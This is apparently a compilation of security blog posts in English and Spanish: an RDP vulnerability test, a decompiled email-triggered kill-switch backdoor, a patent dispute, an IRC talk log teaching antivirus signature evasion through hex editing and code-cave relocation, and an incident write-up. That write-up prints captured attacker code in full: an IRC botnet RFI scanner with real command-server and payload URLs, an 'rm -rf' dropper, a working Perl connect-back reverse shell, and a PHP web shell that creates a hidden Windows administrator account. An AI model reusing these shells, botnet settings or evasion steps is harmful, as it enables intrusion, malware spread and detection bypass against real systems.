So I put my gmail address and click test, I don’t have any RDP at my home address but I wanted to see how they do it with closed ports, then I’ll setup an exploitable RDP and let them scan me :) and update this post!

After you click on test you will receive something on the email like this (IP Address removed):

IP address tested: XXX.XXX.XXX.X
Time of test: Sat, 24 Mar 2012 14:50:38 EST
Result: RDP Port Filtered (Inconclusive)

Hmmm… We were unable to determine if we could access Remote Desktop Protocol from the Internet on it’s standard port. When we tested there was no response. This generally means that there is a firewall configured to be invisible – which is a good thing – but it can also be caused by network issues, ISP filtering, etc.
Because of this we cannot make a confident assessment of your exposure.

To err on the safe side you should assume that this means that your network is potentially vulnerable to exploitation of the MS12-020 RDP vulnerability from the Internet and is likely to contain unpatched systems.
Here’s a few things you can do…

Patch ALL of your Windows systems with the MS12-020 patch from Microsoft. To do this simply run Windows Update until it no longer suggests updates, or you can manually download Microsoft security bulletin and patches from Microsoft’s advisory here.

Check that you’ve patched ALL of your systems. Not just the Internet facing ones. When this vulnerability gets turned into an self-propagating RDP worm you’ll thank us for this advice.

Close off port Remote Desktop Services (RDP) to the Internet. RDP runs on TCP port 3389. If this means nothing to you, ask your I.T. guy.

Disable RDP on machines that don’t need it. RDP is fantastically useful, but if you don’t need it, turn it off.

Give your I.T. guy a smack on the wrist and tell him/her to stop running Remote Desktop Protocol on the Internet. This is a risky practice, superbug or no superbug, because it gives full access to a machine. Use a VPN for remote access instead.

From Microsoft: “Consider how you might harden your environment against unauthenticated, attacker-initiated RDP connections.” Some of the tips here are a part of this general advice. If you need more help with this get in touch via our contact form.

Read, understand and action the advice from Microsoft here and here. If none of it makes sense to you, talk to your I.T. guy or get in touch via our contact form.

This is pretty cool and useful at least for the average joe :)

I still wonder … IS THE RDP EXPLOIT OUT YET!?!?!?!?

The problem raised when as soon as they took over the network within the hour a critical system for the business stopped working, this was more than suspicious as before in another business that was also admin by this person before had some files erased and configurations lost when it was transitioned to another admin because of lack of administration and ethics on the admin part.

First I tried to decompile the python files form the Django server, this was because obviously all the servers where blocked but for port 80. My friend innocently forgot to block all access to the internet as he thought that was not that hardcore important (#FAIL) and he didn’t really think this person (who know actually is consulting for a major bank in Mexico) would backdoor and do this type of stuff.

The first thing was to run it on strings to figure out what is there (credentials and paths removed for security reasons):

fsckOSX:~ nahual$ strings py_util.pyc
EmailMultiAlternatives(
MIMEImage(
datetimeN(
Parsers
fxxxxxxxxxxo@gmail.comt
mxxxgyyczzt
LOCKSYSTEMt
UNLOCKSYSTEMt
GETIPs$
/home/xxxxxxx/svn/yyyyyyyy/.python.logc
pop.gmail.comi
Subjectt
bloqueandot
desbloqueandot8
2baa224d0a3515912218fd88c1dd9d90d347c451c67811ac6240f4a1(
poplibt
POP3_SSLt
usert
pass_t
passwdt
Exceptiont
lent
listt
ranget
retrt
joinR
parsestrt
LOCKt
opent
file_logt
writet
closet
UNLOCKR
check_ipt
quit(
errt
numerot
responset
headerLinest
bytest
mensajet
emailt
subjectt
/home/xxxxxxx/svn/yyyyyyy/../yyyyyyy/py_util.pyt
check_locker
setup_environ(
BeautifulSoups
hxxxxxxx3@gmail.comR

http://www.cualesmiip.comt

divt
miipt
IP del servidort
from_emails
text/html(
urllib2t
django.core.managementR/
xml.dom.minidomR0
settingst
urlopent
readt
findt
findAllR
DEFAULT_FROM_EMAILt
attach_alternativet
send(
xmlR0
listmailt
contentt
feedR&
html_contentR,
msg(
/home/xxxxxxx/svn/yyyyyy/../yyyyyy/py_util.pyR
__main__(
django.core.mailR
email.MIMEImageR
smtplibR
email.ParserR
__name__(
/home/xxxxxxxx/svn/yyyyyy/../yyyyy/py_util.pyt

fsckOSX:~ nahual$

py_util.pyc wouldn’t fastly decompile, thus after putting it into IDA and other nice decompile this is what was found (credentials removed for security reasons):


from django.core.mail import EmailMultiAlternatives
from email.MIMEImage import MIMEImage
from datetime import datetime
import smtplib
import poplib
from email.Parser import Parser

def check_ip():
import urllib2
from django.core.management import setup_environ
import xml.dom.minidom
from BeautifulSoup import BeautifulSoup
import settings
setup_environ(settings)
listmail = ['xxxxxxxx@gmail.com']
content = ''
feed = urllib2.urlopen('http://www.google.com')
response = BeautifulSoup(feed.read())
html_content = response.find('div', {'id': 'miip'}).findAll('b')[0]
subject = 'IP del servidor'
msg = EmailMultiAlternatives(subject, content, to=listmail, from_email=settings.DEFAULT_FROM_EMAIL)
msg.attach_alternative(html_content, 'text/html')
msg.send()
if (__name__ == '__main__'):
check_ip()


As you can see the backdoor is pretty small and “efficient”, it checks a gmail account, if an email to that account is sent with the LOCKSYSTEM it will automatically shutdown the application, and you can of course unlock the system with another email.

This might be coded because they thought maybe the client wouldn’t pay them? why would he code something like this without the client consent? no documentation was delivered from the code, and as soon as the admin/developer was let go, the system was shutdown within the hour, sounds to me more like a blackmail function than a current admin function as it only turns off the system, no backups anything.

This makes me wonder why this would be created? or executed? I thought about writing a fast and ugly rule to make sure if anything happened like this again at least the snorts would be alerted and told my friend to lock down the firewall rules, but this lack of ethics is overwhelming, I wonder what the bank would think of him being used to backdoor stuff to keep a foot in the door? jeeeeezzzzz

Snort rule would not really work as it’s doing pop3 over SSL, but then blocking port 993 should lock him out, still … why people do this? don’t they understand this lack of ethics is preposterous?

I recently catch upon Cenzic having a pretty interesting patent, which basically covers any code that baselines a web page and then injects faulty code into parameters to verify vulnerabilities. Yes you read correctly, this patent awarded in 2007 covers all web scanners and even powerful fuzzers into the patent, why it was granted? beats me I presume whoever checked it out didn’t really find prior art (there is) or really understand what was being patented (go lawyer+techie talk) the result? an overlapping patent.

Now a patent should ALWAYS be used defensively, which means “I protect myself from other people coming and breaking my stuff, asking me for money for something I developed or saying I didn’t create it” the problem is, Cenzic is NOT using the patent defensively, they are using it to get money out of web scanner companies.

IBM/HP already did a cross licensing deal with them, (probably giving them their crawler technology) and now they went and asked NTObjectives an insane amount of money, result? NTObjectives is fighting back, the filed a suit which will then break the patent and stop this company from basically extorting money out of other companies for a very generic and broken patent.

It makes me sad, why? because one of the patent owners is someone I really respect: Greg Hoglund, the founder of rootkit.com, his books are great and I love them, but this patent, this is wrong. It saddens me the fact that someone on the security environment (I hate using the industry word, because grayhats and blackhats are not on the industry but are still on the environment) would do this and let it go.

I created then the website www.stop232patent.com you can follow an in depth detail of the analysis of the patent, trial, prior art, etc.

As the release of trapper was getting closer I started thinking what good would the complete release of the software will do, and I came up with this answers:
- Nothing, nobody would use it
- Some people would use it for kicks, mostly to hack their own networks or hack work
- It could be used to crack something large and big
- Other people would use it on their audits, call me I’m finished and keep on using my research and work.
- Man in black would seize my server (since it’s on the US) and force the app to be erased after magically appearing with a copy of it.

While the last one appears definitely far fetched the third one got me thinking seriously, not only because of the nature of my research has gone definitely into Hydras and AI / Neural Networks / Expert Systems but because potentially sooner or later it could be pushed into the light and someone will do something that would compromise the years I’ve work on the security field.

I’m not calling that a reporter, as the ones I know they have been always fair to me in developing at story, but today as I unleashed the third rewrite of trapper (yes I had to rewrite 2 times already due to redesign of the objects) someone at the starbucks checked their email via pop, in less than 5 minutes all his email was parsed, loged into facebook, found, friends found, had his avatar picture and was searching who he was talking to in MSN. At that second I realized I stupidly left the domain into * and not localhost, definitely my mistake but … it suddenly hit me, am I making stuff secure or insecure releasing this?

The answer was “You are making stuff completely insecure, people won’t understand what is going on, it will be just pure blood and your point across will be lost” so my decision is to open trapper only to a few people without hard modules and keep it for Yaguarete as part of the internal tools, not because I don’t want to, believe me with the design I made a proficient coder will have no trouble to create it’s own little hydra, but it won’t me mine, it won’t be code breaking hard into stuff I seriously do not want to even ping.

YES I’ve become soft, YES I’m not the guy who used to rampage like 10 years ago in G-Con, but then again who would be? are you really a sane person holding into something that happened or said 10 years ago? is your life THAT pathetic?

I’ve seen people come from total “n00bs” into amazing hackers, like HKM I remember him messaging me saying he got hist first overflow after reading a paper then all the sudden he is destroying 2Wire with amazing research, people evolve, everything evolves, why wouldn’t I just evolve?

As I was reading the leaks that might break spies and complete networks of the CIA on Afganistan because of a leak I said “well sure government did stuff they shouldn’t have done? most probably but then again should documents leak THAT harshly?” I’m not condemning or applauding the act I just wondered “what if code I wrote ever is used for that?”

You might not have met me in my “worst” years, when I tough I was invincible, when nobody was smarter than me, more connected than me, etc. but I realize that those years I did more damage than help, I turn around and I smile when people tell me they look up to me and they have shaped cons in the sense of G-Con or stuff like that (I have to say that having someone name his kid after you felt great, thank you Pedro Navarro -byteStriker-)

Anyway I’m still alive, am I the same? no, is my research the same? probably is it still agressive? As much as I need to, because at the end, my research is only for me now, I don’t want any more fame, I don’t want the spotlight anymore, I’ve had my 15 minutes of fame, I want to do what I like, what I want and just be happy (breaking stuff sure why not)

Will trapper ever be public? to be honest it might, just not right now I’d like to keep the advantage before other companies use it and call my company inferior, anyway it will have a mixed license so too bad for ppl that will use it for commercial.

If you are interested in a copy of it, contact me and we can chat but I don’t promise anything.

el log de una charla ke di en un canarl irc sobre las firmas de los av’s

y como kitarselas a nuestros juguetitos experimentales xP

<Psymera> ah si no les comente mi gato se llama antivirus
<Psymera> y es la onda xxD
<sdc> jajajaja
<rey_brujo> Juar!
<Etal> Llamaba….
<sdc> neta?
<Drackoz> ~
<sdc> que cool
<sdc> XD
<Etal> se murio
<Psymera> no ese es otro
<elprimodel5patas> ./cry
<sdc> lo compro symantec
<Psymera> era la particion ToT
<Psymera> XD
<elprimodel5patas> lol
<hkm> xD
<Drackoz> Xd
<Psymera> bueno ahora si me pondre serio ( aja xD)
<elprimodel5patas> no, ya enserio hablales chimero por que estamos perdiendo auditorio
<jimtronic> hablen
<Psymera> (es el chiste para no hacer ridiculo en grande)
<Links_Engel> jajaja
<Psymera> bueno ya xD
<Psymera> como todos sabemos hay tres metodos conocidos de detecion de virus XD
<Psymera> por Firmas
<Psymera> por heuristica
<Psymera> y la ahora tan famosa y sonada proactiva( como la bautiso el kaspersky)
<Psymera> bueno las Firmas son basico encontrar un archivo con siertos valores en ekis direccion
<Psymera> haci nos detecta faiclmente ke tenemos un mydoom.abx
<Psymera> o etc
<Psymera> la heuristica okupa tanto firmas muy comunes en offsets, como la tabla de importaciones del archivo
<Psymera> y la famosa proactiva (aja XD) ke no es mas ke hookear las apis del sistema
<Psymera> y haci cogernos de los eggs xP
<Psymera> en si nos enfocaremos ah la heuristica por ke es la divertida y facil de parchar XD
<Psymera> y con eso nos llevamos firmas entre las panteras xP
<Psymera> en si es una vercion modificada sobre las firmas clasicas las cuales tmb las cheka en memoria xP
<Psymera> por eso aun ke le pongamos upx o demaz compresores al cargarlo en memoria nos detectara facilmente
<Psymera> bueno para kitar firmas hay varias tecnicas
<Psymera> de las conocidas esta la  RIT, MEEPA y hex XD
<Psymera> hoenstamente de estas tres ke son als mas conocidas la hex es una ke se basa solamente en la suerte para ke sea funcional
<Psymera> y las otras dos es necesario conocimiento mas o menos decente de asm
<Psymera> bueno para poder hacer todo esti primero tenemos ke encontrar las firmas ke hay ke modificar
<Psymera> lo mas basico ke necesitamos, block de notas, hex editor y el AV del cual keremos sacar los offsets
<Psymera> primero una carpeta la excluimos del scaneo por parte de nuestro AV
<Psymera> ahi guardaremos nuestro kerido malware  ke no distribuiremos y solo lo haremos por experiementacion ( aja :p)
<Psymera> lo vamos abrir con nuestro hex editor y vamos ah rellenar la mitad de el con bytes nulos XD y guardamos esa copia modificada en una carpeta ke si sea escaneada por nuestro av residente
<Psymera> el chiste de esto
<Psymera> es ke nos lo detecte el av
<Psymera> y nos borre esa muestra
<Psymera> o la kite o grite o lo ke sea ke haga el Av xP
<Psymera> el chiste es buscar el lado donde no nos indike ke fue encotnrado
<Psymera> apartir de ello trataremos de redusir la buskeda
<Psymera> osea volvemos au nuestro hex editor y rellenamos denuevo pero en un espacio mas pekeño
<Psymera> haci ke con mucha pasiencia cafe y musica podemos sacarlo manualmente
<Psymera> muchas de las veces( por no decir ke todas) nuestro rat packer o lo ke sea es detectado por varias firmas
<Psymera> entonces tenemos ke ir haciendo pekeños rellenados con el hex editor
<Psymera> y para no perdernos okupamos nuestro notepad para guardar neustro avanze y no kedar dañados con tanto numero XD
<Psymera> bueno esta tarea se puede simplificar okupando herramientas espesificas como son
<Psymera> signature cero, AVDevil y varias mas
<Psymera> ke lo ke hacen es hacer este rellenado pero de una forma mas burda por llamarlo de una manera
<Psymera> ya ke van creando ejemplares con blokes de un taaño determinado
<Psymera> estas eran utiles o bueno lo son cuando nuestro AV es detectado por una sola firma
<Psymera> (bien ahroa el super comercial de mi tool xD)
<elprimodel5patas> go go go go!!
<Psymera> bueno por ese motivo yo cree la herramienta AAVTools (Anti AntiViral Tools) ke sirve para identificacion de multiples firmas
<Psymera> esta basada en la idea principal de signature cero de darnos una apariencia mas amigable en la deteccion de firmas
<Psymera> poniendonos una linda barrita la cual reprecentara el cuerpo de nuestro amado malware xP
<Psymera> (termina comercial, al final sabran como cosnegirlo con faciles pagos de 9.95 xD)
<Psymera> bueno suponiendo ke ya tenemos nuestra lista de firmas
<Psymera> okuparemos la tecnica ke mas nos guste o acomode
<Psymera> (bueno primero para tirarle tierra a la hex XD)
<Psymera> se trata de teniendo nuestra firma okuparemos un hex editor para ver su valor y sumarle o restarle un valor para ke no sea detectado
<Psymera> oviamente esto kitara la firma detectada pero lo ams provable es ke mate el flujo del programa
<Psymera> ya ke estamos moviendo valores ah ciegas
<Psymera> la tecnica rit se basa en mover un bloke de instrucciones ah otra parte del programa y volver al flujo normal
<Psymera> y la meepa es una vercion modificada de la rit
<Psymera> pero podriamos decir ke mas practica
<Psymera> se trata de modificar los valores con un hex editor ah nuestro programa original y ponerle una rutina al principio del mismo ke nos vuelva a poner los valores originales pero en memoria
<Psymera> bueno para cualkiera de estas dos tecnicas necesitamos encontrar caverns en nuestro programa
<hkm> asi es como se ve el tool de psymera (bueno la version anterior): http://img264.imageshack.us/img264/8896/screenshotpq6.jpg
<Psymera> ke no son mas ke huecos ke deja el compilador ah la hora de crearlo para mantener alineadas las direcciones en memoria o demaz xP
<Psymera> para ello hay varias tool;  PEID, un script de ollydbg, topo(herramienta especialisada en ello) y otras mas
<Psymera> (cof cof la nueva vercion de mi tool ya hace tmb esa funcion)
<Psymera> pero bueno la mas okupada es el topo
<Psymera> esta herramienta nos da la opcion de buscar un tamaño minimo de la caverna o de no ayarlo aumentar el tamaño de alguna seccion o añadir una nueva para tenerlo
<Psymera> la mayoria de las veces no necesitamos okupar esas dos ultimas opciones
<Psymera> pero bueno volviendo ah la rit
<Psymera> abriremos ahora nuestro malware a modificar en en ollydbg
<Psymera> y buscaremos nuestra offset
<Psymera> bueno para ayarla se me olvido decirles tmb xP
<Psymera> ke okuparemos saber el valor de la imagebase del programa
<Psymera> para sumarlo ah nuestro offset y tener nuestra direccion como RVA XD
<Psymera> bueno teniendo la RVA del offset la buscaremos en el olly
<Psymera> bueno primero buscamos nuestra firma ke es detectada
<Psymera> como es un solo byte generalmente okupara parte de intruccioens mas grandes
<Psymera> por ejemplo supongamos ke nuestra firma tiene un valor f6
<Psymera> y la encontramos en estea instruccion
<Psymera> 00403505   31F6             XOR ESI,ESI
<Psymera> bueno copiaremos esta intruccion ah nuestro block de notas xP
<Psymera> ademas de las siguientes tres
<Psymera> 00403505   31F6             XOR ESI,ESI
<Psymera> 00403507   8932             MOV DWORD PTR DS:[EDX],ESI
<Psymera> 00403509   5F               POP EDI
<Psymera> 0040350A   5E               POP ESI
<Psymera> esto es por ponerles un ejemplo
<Psymera> y guardamos la direcciond e la siguiente instruccion
<Psymera> bien ya teniendo nuestro bloke de instrucciones okuparemos nuestra caverna
<Psymera> de igual forma ke sacamos la RVA de la firma
<Psymera> sacamos la caverna y nos dirigimos ah ella
<Psymera> y copiaremos nuestro bloke de instrucciones ke copiamos ah ella
<Psymera> al terminal el bloke le añadiremos un JMP 0040350B ke es en nuestro caso la siguient insutrccion ke se ejecutaria en el programa
<Psymera> y volvemos denuevo a la direccion de nuestra firma
<Psymera> y ah la intruccion la sobreescribiremos con un JMP direccion_de_la_cave
<Psymera> y ya guardamos nuestro ejecutable modificado y lo corremos para provarlo
<Psymera> el AV no nos lo deve de tomar como espesimen o en todo caso ke aun nos detecte lo hara como una variante diferente o como otro malware, por las firmas detectadas
<sdc> que pasa si el programa hace referencia a la memoria que desplazamos? por ejemplo si es un for que tiene como marcador de inicio la instruccion 403509 o algo asi..
<sdc> se muere el programa supongo, no seria mas eficiente colocar instrucciones equivalentes?
<Psymera> para eso existe la tecnica meepa xP
<sdc> como en ese xor esi esi, un mov esi 0
<Psymera> ke es una vercion refinada de la rit o pordriamos buscar otras firmas mas sencilla ke sean detectadas
<Psymera> aun ke si es valido como lo dices pero el problema es ke igual no son del mismo tamaño las intrcciones
<sdc> ah sisi
<sdc> eso es verdad
<Psymera> entocnes tendriamos ke mover mucho las direccion y demaz
<sdc> pero la de meepa recrea el virus en memoria no?
<Psymera> haci es
<sdc> muchos antivirus checan tambien la memoria no?
<sdc> no solo el archivo
<Psymera> en parte
<Psymera> hacen un chekeo en memoria pero solo X instricciones o tiempo al principio
<sdc> ah vaya
<Psymera> bueno deja explico mepa xP rapido para regrear ah esto
<Psymera> bueno tal como sdc comento mepa se trata de recostruir el programa en memoria
<Psymera> esto se hace teniendo las offsets y sus valores originales
<Psymera> al principio del programa antes de cualkier instruccion crea un salto a una cave
<Psymera> la cual contiene un codigo ke regenera los valores en memoria ah su estado original
<Psymera> y despues regresa al flujo normal del programa
<Psymera> por lo cual muchas firmas dificiles de modificar o sencibles ya no lo son
<Psymera> pero bueno aki encotnramos el problema del analizis en memoria
<Psymera> los antivirus igual nos buscan las firmas una vez cargado en memoria y durante los primeros X ciclos de ejeccion
<Psymera> entre ello va la simulacion de ejecuccion para buscar firmas o rutinas sospechosas
<Psymera> pero bueno esto no es una labor infinita o ke se mantenga ah lo largo de toda la ejecucion
Psymera> por lo mismo ke es demaciado costoso en recursos
<Psymera> y gracias ah ello podemos evitar mucha deteccion cuando somos geniales en asm y sabemos meter unas buenas rutinas haci en bruto en las cavernas o teniendo el codigo fuente
<sdc> jajaja..
<Psymera> por ejemplo karsperky es muy facil de saltar su heuristica por ello mismo
<Psymera> por poner un ejemplo comunmente okupado en malware echo en vb
<Psymera> es el de poner un timer ah X cantidad de mili segundos y ese a su vez active otro timer y haci ssesivamente XD
<Psymera> aun ke bueno se puede hacer on uno solo y solo okupar un bloke
<Psymera> o okpar un hilo
<Psymera> el chiste es ke okupemos esa cantidad de chekeos ke tiene permitido hacer
Psymera> y con ello saltarnos su heuristica
<Psymera> esto de igual forma podemos implementarlos con las tecnicas ke comente anteriormente para introduccion de codigo
<Psymera> bien bueno
<Psymera> preguntas comentarios
<Psymera> mentadas? XD
<Psymera> me falto algo? xP
<hkm> tu tool lo pondre en el log de la platica
<hkm> attacheado al post
<Psymera> vap xP
<elprimodel5patas> esta muy chinga la tool
<Psymera> bien de perdida refreskenmela XD
<Drackoz> no pues estuvo buena la exposicion del meepa
<hkm> Se me hizo interesante todas las formas diferentes de brincar las firmas, y es lo mismo para packers y crypters y demas?
<Psymera> haci es
<SAKIA> eip!! meepa rulez!! or algun killav
<Psymera> no me gustan en lo personal los killav
<elprimodel5patas> por?
<SAKIA> no son etikos jajajaja
<Psymera> son poko artisticos y chillan mucho
<Psymera> cuando vez ke el iconito del AV ya noe sta en el task
<Psymera> te espantas
<elprimodel5patas> lol
<elprimodel5patas> verga que le hice!
<elprimodel5patas> te paniqueas tu
<Psymera> esactamente eso ,xd
<elprimodel5patas> en ves de la compu
<elprimodel5patas> si me ah pasdo jeejejej
<elprimodel5patas> que eliminas cosas que no querias
<SAKIA> tienen su chiste pero si hicieras tu colecc de icons
<SAKIA> asi nomas cuelgas un icono basura pa que no se den cuenta jajaja y hasta los procesos fakeaz
<Psymera> esta bien eso
<Psymera> pero honestamente ah mi me gusta mas la parte romantica de uno contra la compañia completa del AV XD
<SAKIA> pues tambien es jocoso uno contra el av
<hkm> muy bien pues con eso terminamos las platicas
<sdc> deberias hacer un killav que ponga un icono que sea iwal al antivirus que usas
<jimtronic> pos aprendimos mucho ahora
<sdc> y no haga nada, nomas este ahi
<SAKIA> sdc es lo que io decia
<sdc> seh buena idea
<Psymera> xD
<sdc> jajajaja
<Drackoz> valio la pena la espera
<Drackoz> y la desvelada

Bueno me toco ayudar a una persona que le hicieron una intrusion con inclusion de codigo, es bastante interesante porque se vio ejecutar perl Scan009.txt que me llamo la atencion y lo consegui del sitio donde bajo el botnet el ataque:

http://matudesign.com/dh/imagenes/Scan2009.txt

#!/usr/bin/perl

  ##################################################################
  ##                                                                                 ##
  ##                                                                                 ##
  ##                                                                   05/06/2008    ##
  ##  Author  : BitchX and Osirys                                                    ##                                                             ##
  ##  Team    : FullNetWork                                                          ##
  ##  Ircd    : irc.fullnetwork.org                                                  ##
  ##  WebSite :                                                                      ##
  ##  Contact : safes[dot]modes[at]gmail[dot]com                                     ##
  ##                                                                                 ##
  ##                                                                                 ##
  ##  Release: v1 Private                                                            ##
  ##                                                                                 ##
  ##                                                                                 ##
  #####################################################################################

### !!_/ PRIVATE

use IO::Socket::INET;
use HTTP::Request;
use LWP::UserAgent;

#######################################################
## CONFIGURATION                                     //
#######################################################

my $id    = "http://matudesign.com/dh/imagenes/02.txt??"; #Your RFI Response
#Shell printed on the Vulnerable Site
my $shell = "http://matudesign.com/dh/imagenes/cmd-shell.txt??";
my $ircd  = "64.136.61.195";
my $port  = "7000";
my $chan1 = "#offspring"; #Chan for Scan
my $chan2 = "#offspring"; #bot will be printed here too
my $nick  = "[D]PRIVATE".(int(rand(100)));
my $sqlpidpr0c = 1; # This is the number of sites that the bot will test in the same time.
#For an accurated scann, it's reccomended to set a low number(1)
# (Expecially if you are scanning on 0day bugs), so a lot of presunted vulnerable sites.
#Unless you will see the bot exiting by an excess flood!
# Instead, if you are scaning on old bugs, so not many results,
# you can put a higher number, so more speed.
my $rfipidpr0c = 50;
my @User_Agent = &Agent();

### USEFULL OPTIONS ( 0 => OFF  ;  1 => ON )

my $spread = "http://matudesign.com/dh/imagenes/01.txt??";

my $spreadACT = 0; #0 ->disabled, 1 ->enabled
my $securityACT = 0; #0 ->disabled, 1 ->enabled

my $killpwd = "lol"; #Password to Kill the Bot
my $chidpwd = "lol"; #Password to change the RFI Response
my $cmdpwd = "lol"; #Password to execute commands on the server
my $secpwd = "lol";
my $spreadpwd = "lol";

my $badspreadpwd != $spreadpwd;
my $badkillpwd != $killpwd;
my $badidpwd != $chidpwd;
my $badcmdpwd =! $cmdpwd;

#######################################################
## END OF CONFIGURATION                              //
#######################################################

open( $f1le, ">", "rm.txt" );
print $f1le "\#!/usr/bin/perl\n";
print $f1le "exec(\"rm -rf \*siti\*\")\;\n";
close $f1le;

my $sys = `uname -a`;
my $up = `uptime`;

if ($spreadACT == 0) {
    $t5 = "OFF";
}
elsif ($spreadACT == 1) {
    $t5 = "ON";
}

if ($securityACT == 0) {
    $y5 = "OFF";
}
elsif ($securityACT == 1) {
    $y5 = "ON";
}

$k=0;

if ( fork() == 0 ) {
    &irc( $ircd, $port, $chan1, $chan2, $nick );
}
else {
    exit;
}

... LONG BORING CODE AVAILABLE ON DEMAND ...

## PRIVATE
## Coded by BitchX and Osirys

Este script esta intersante, esta hecho para tomar comandos desde IRC para hacer scans masivos, infectar mas servers y agregarlos dentro de la botnet y reportarse (me encantaron sobre todo los passwords en los que podemos tomar control de la botnet nosotros mismos) asi tambien agregaron y ejecutaron los siguientes scripts:

http://matudesign.com/dh/imagenes/02.txt

#!/usr/bin/perl

use IO::Socket;

#IRAN HACKERS SABOTAGE Connect Back Shell          

#code by:LorD

#We Are :LorD-C0d3r-NT                                           

#Email:LorD@ihsteam.com

#

#lord@SlackwareLinux:/home/programing$ perl dc.pl

#--== ConnectBack Backdoor Shell vs 1.0 by LorD of IRAN HACKERS SABOTAGE ==--

#

#Usage: dc.pl [Host] [Port]

#

#Ex: dc.pl 127.0.0.1 2121

#lord@SlackwareLinux:/home/programing$ perl dc.pl 127.0.0.1 2121

#--== ConnectBack Backdoor Shell vs 1.0 by LorD of IRAN HACKERS SABOTAGE ==--

#

#[*] Resolving HostName

#[*] Connecting... 127.0.0.1

#[*] Spawning Shell

#[*] Connected to remote host

#bash-2.05b# nc -vv -l -p 2121

#listening on [any] 2121 ...

#connect to [127.0.0.1] from localhost [127.0.0.1] 32769

#--== ConnectBack Backdoor vs 1.0 by LorD of IRAN HACKERS SABOTAGE ==--

#

#--==Systeminfo==--

#Linux SlackwareLinux 2.6.7 #1 SMP Thu Dec 23 00:05:39 IRT 2004 i686 unknown unknown GNU/Linux

#

#--==Userinfo==--

#uid=1001(lord) gid=100(users) groups=100(users)

#

#--==Directory==--

#/root

#

#--==Shell==--

#

$system	= '/bin/sh';

$ARGC=@ARGV; 

print "--== ConnectBack Backdoor Shell vs 1.0 by xiP / eu kero comprar meu carroOOOo..!!! ==-- \n\n"; 

if ($ARGC!=2) { 

   print "Usage: $0 [Host] [Port] \n\n"; 

   die "Ex: $0 127.0.0.1 2121 \n"; 

} 

use Socket; 

use FileHandle; 

socket(SOCKET, PF_INET, SOCK_STREAM, getprotobyname('tcp')) or die print "[-] Unable to Resolve Host\n"; 

connect(SOCKET, sockaddr_in($ARGV[1], inet_aton($ARGV[0]))) or die print "[-] Unable to Connect Host\n"; 

print "[*] Olhando o servidor...\n";

print "[*] ConectandO... $ARGV[0] \n"; 

print "[*] Spawning Shell \n";

print "[*] Connected to remote host \n";

SOCKET->autoflush(); 

open(STDIN, ">&SOCKET"); 

open(STDOUT,">&SOCKET"); 

open(STDERR,">&SOCKET"); 

print "--== ConnectBack Backdoor vs 1.0 by by xiP / eu kero comprar meu carroOOOo..!!! ==--  \n\n"; 

system("unset HISTFILE; unset SAVEHIST ;echo --==Systeminfo==-- ; uname -a;echo;

echo --==Userinfo==-- ; id;echo;echo --==Directory==-- ; pwd;echo; echo --==Shell==-- "); 

system($system);

#EOF

Ojo con el MAESTRO del system (me preugnto yo para que hacer tanto show y que pasa si no esta el command o peor eso se ve fuertisimo pero bueno no podemos pedir demaciado, jejejejeje

Y esta preciosura tambien:

 
TAG html TAG
TAG head TAG
TAG meta content="text/html; charset=ISO-8859-1" http-equiv="content-type" TAG
TAG /head TAG
TAG body TAG

';
 mail("math3us1m@hotmail.com", $asunto, $msg, $cabeceras);
 ?>


Manda un email a math3us1m@hotmail.com avisandole del hack, mandemosles muchos y muchos correos de hack! jajajaja porque no?
Y para mantener el control usan: http://matudesign.com/dh/imagenes/cmd-shell.txt
TAG html TAG
TAG head>
TAG meta http-equiv="Content-Language" content="pt-br">
TAG meta name="GENERATOR" content="Microsoft FrontPage 5.0">
TAG meta name="ProgId" content="AoD">
TAG meta http-equiv="Content-Type" content="text/html; charset=windows-1252">
TAG title>My life is Crazy Man TAG/title>
TAG style type="text/css">
A:link {text-decoration:none}
A:visited {text-decoration:none}
A:hover {text-decoration:underline}
A:active {text-decoration:underline}
body,td {
 font-family: verdana;
 font-size: 8pt;
 background-color: #006600;
}
a{
 color: #0000FF;
 text-decoration: none;
}
a:hover {
 color: #FF0000;
 text-decoration: underline;
}
TAG /style>
TAG /head>
TAG body >
TAG center>
 --== ?YOUNGEST? Hack Shell==-- 


TAG ?php

 @set_time_limit(0);

 $string = $_SERVER['QUERY_STRING'];
 $mhost = 'http://www.freewebs.com/segunogunyemi/derrr.jpg?';
 $host_all = explode("$mhost", $string);
 $s1 = $host_all[0];
 $fstring = $_SERVER['PHP_SELF']."?".$s1.$mhost;

 $OS = @PHP_OS;
 $IpServer = '127.0.0.1';
 $UNAME = @php_uname();
 $PHPv = @phpversion();
 $SafeMode = @ini_get('safe_mode');

 if ($SafeMode == '') { $SafeMode = "OFF"; }
 else { $SafeMode = "$SafeMode"; }

 $btname = 'backtool.txt';
 $bt = 'http://www.smashed-radio.com/forum/cmds.txt';
 $dc = 'http://www.smashed-radio.com/forum/cmds.txt';
 $newuser = '@echo off;net user Admin /add /expires:never
/passwordreq:no;net localgroup

"Administrators" /add Admin;net localgroup "Users" /del
Admin';
 $bn = 'http://www.smashed-radio.com/forum/cmds.txt';
// Java Script
 echo "TAG script type=\"text/javascript\">";

 echo "function ChMod(chdir, file) {";
 echo "var o = prompt('Chmod: - Contoh: 0777', '');";
 echo "if (o) {";
 echo "window.location=\"\" + '{$fstring}&action=chmod&chdir=' + chdir +
'&file=' + file +

'&chmod=' + o + \"\";";
 echo "}";
 echo "}";
 echo "function Rename(chdir, file, mode) {";
 echo "if (mode == 'edit') {";
 echo "var o = prompt('Ganti Nama File '+ file + ' menjadi:', '');";
 echo "}";
 echo "else {";
 echo "var o = prompt('Ganti Nama Folder '+ file + ' menjadi:', '');";
 echo "}";
 echo "if (o) {";
 echo "window.location=\"\" + '{$fstring}&action=rename&chdir=' + chdir +
'&file=' + file +

'&newname=' + o + '&mode=' + mode +\"\";";
 echo "}";
 echo "}";
 echo "function Copy(chdir, file) {";
 echo "var o = prompt('Copied for:', '/tmp/' + file);";
 echo "if (o) {";
 echo "window.location=\"\" + '{$fstring}&action=copy&chdir=' + chdir +
'&file=' + file +

'&fcopy=' + o + \"\";";
 echo "}";
 echo "}";
 echo "function Mkdir(chdir) {";
 echo "var o = prompt('Nama Folder?', 'Folder_Baru');";
 echo "if (o) {";
 echo "window.location=\"\" + '{$fstring}&action=mkdir&chdir=' + chdir +
'&newdir=' + o +

\"\";";
 echo "}";
 echo "}";
 echo "function Newfile(chdir) {";
 echo "var o = prompt('Nama File?', 'File_Baru.txt');";
 echo "if (o) {";
 echo "window.location=\"\" + '{$fstring}&action=newfile&chdir=' + chdir +
'&newfile=' + o +

\"\";";
 echo "}";
 echo "}";
 echo "";

 // End JavaScript

 /* Functions */
 function cmd($CMDs) {
 $CMD[1] = '';
 exec($CMDs, $CMD[1]);
